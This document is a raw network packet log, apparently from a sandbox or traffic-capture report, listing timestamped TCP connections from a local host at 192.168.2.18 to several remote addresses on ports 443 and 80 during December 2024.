                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.136001110 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.184854031 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647811890 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647881985 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647918940 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647934914 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647954941 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647965908 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647980928 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.647996902 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.648009062 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.648032904 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.843452930 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.843487978 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.843631983 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.843652010 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.844084024 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.892319918 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.892348051 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.892466068 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.892479897 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.892502069 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.892515898 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.898088932 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.898176908 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.898236036 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.898756981 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.898772955 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.131033897 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.131081104 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.131156921 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.131369114 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.131385088 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.247288942 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.247339964 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.247407913 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.247633934 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:41.247647047 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.060745001 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.061204910 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.061227083 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.062364101 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.062436104 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.063533068 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.063601971 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.076047897 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.076275110 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.076297045 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.077322006 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.077480078 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.078124046 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.078169107 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.112850904 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.112871885 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.128849983 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.128870964 CET4434971513.126.107.86192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.160857916 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.176863909 CET49715443192.168.2.1813.126.107.86
                                                                                                                                                                                                                          Dec 17, 2024 18:20:43.828217983 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.129858971 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.288135052 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.288182020 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.288284063 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.288566113 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.288579941 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:44.736911058 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.524154902 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.524502993 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.524528027 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.524861097 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.525315046 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.525383949 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.525495052 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.571336985 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:45.945883036 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039767027 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039799929 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039813995 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039866924 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039882898 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039926052 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.039949894 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.202750921 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.202780008 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.202836990 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.202852964 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.202892065 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.202907085 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227421999 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227483034 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227488995 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227513075 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227520943 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227561951 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227740049 CET49722443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:46.227751970 CET4434972213.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:48.356885910 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:20:48.763366938 CET804970276.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:48.763427019 CET4970280192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:48.844860077 CET4970280192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:48.967385054 CET804970276.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:50.956048012 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:20:51.260237932 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:20:51.861875057 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.521080017 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.521125078 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.521505117 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.521816015 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.521828890 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.761133909 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.761194944 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.762141943 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.815162897 CET49716443192.168.2.18142.250.181.100
                                                                                                                                                                                                                          Dec 17, 2024 18:20:52.815195084 CET44349716142.250.181.100192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.069859982 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.166059017 CET49673443192.168.2.18204.79.197.203
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.762423992 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.762672901 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.762700081 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.763062000 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.763358116 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.763423920 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:53.817934036 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.663475037 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.663516045 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.663589954 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.663985968 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.664002895 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.664434910 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.664470911 CET44349771172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.664530993 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.664758921 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:54.664772034 CET44349771172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.470880985 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.625818014 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.625830889 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.625929117 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.626416922 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.626426935 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.629394054 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.671374083 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.881824970 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.882267952 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.882307053 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.883272886 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.883357048 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.883779049 CET44349771172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884067059 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884093046 CET44349771172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884426117 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884476900 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884495974 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884567022 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884581089 CET44349770172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884592056 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884630919 CET49770443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884962082 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.884989977 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.885063887 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.885118008 CET44349771172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.885179996 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.885278940 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.885294914 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886107922 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886121988 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886161089 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886178970 CET44349771172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886234045 CET49771443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886380911 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886406898 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886466980 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886627913 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.886637926 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987364054 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987399101 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987406969 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987437010 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987453938 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987467051 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987585068 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987658024 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987716913 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:55.987718105 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187391043 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187417984 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187653065 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187654018 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187683105 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187753916 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187755108 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.187805891 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.188430071 CET49761443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.188443899 CET4434976113.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.203553915 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.203600883 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.203713894 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.204025030 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.204041004 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.868773937 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.869184971 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.869215012 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.870678902 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.870883942 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.871098995 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.871181011 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.871273994 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.871282101 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:56.922926903 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.101799011 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.102176905 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.102210045 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.103080034 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.103144884 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.104084015 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.104145050 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.104348898 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.104362011 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.107301950 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.107534885 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.107563019 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.109303951 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.109375954 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.111574888 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.111723900 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.156903028 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.156912088 CET44349778172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.157072067 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.204926968 CET49778443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.314632893 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.314743996 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.314796925 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.317545891 CET49775443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.317568064 CET4434977513.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.454911947 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.455295086 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.455318928 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.455661058 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.456085920 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.456149101 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.456406116 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.499367952 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967116117 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967387915 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967448950 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967515945 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967648029 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967705965 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.967722893 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.975524902 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.975584984 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.975601912 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.984009981 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.984080076 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.984098911 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.992392063 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.992468119 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:57.992485046 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021781921 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021819115 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021846056 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021889925 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021910906 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021928072 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.021960974 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.045896053 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.087085009 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140561104 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140593052 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140661955 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140687943 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140723944 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140739918 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.140861988 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.158883095 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169195890 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169258118 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169287920 CET44349777172.67.208.33192.168.2.18
